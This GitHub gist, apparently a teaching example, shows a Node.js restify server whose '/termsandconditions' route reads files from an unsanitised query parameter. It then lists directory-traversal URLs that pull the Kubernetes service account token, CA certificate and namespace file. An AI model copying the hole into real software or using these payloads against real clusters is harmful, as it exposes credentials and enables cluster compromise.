Skip to content

Instantly share code, notes, and snippets.

@lawrencegripper
Created July 17, 2017 10:15
Embed
What would you like to do?
WARNING: Example of nodejs app with directory traversal attack
var restify = require('restify');
var fs = require('fs');
var restifyPlugins = require('restify-plugins');
var server = restify.createServer();
server.listen(process.env.port || process.env.PORT || 3978, function () {
console.log('%s listening to %s', server.name, server.url);
//Do some initialization here ....
// Get data from storage or cache etc
isServerReady = true;
});
server.use(restifyPlugins.queryParser());
server.get("/termsandconditions", function(req, res, next){
let name = req.query.version;
let fileContent = fs.readFileSync('termsandconditions/' + name).toString()
res.send(200, fileContent);
});
http://clusterfqdn:3978/termsandconditions?version=../../../var/run/secrets/kubernetes.io/serviceaccount/token
http://clusterfqdn:3978/termsandconditions?version=../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
http://clusterfqdn:3978/termsandconditions?version=../../../var/run/secrets/kubernetes.io/serviceaccount/namespace
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment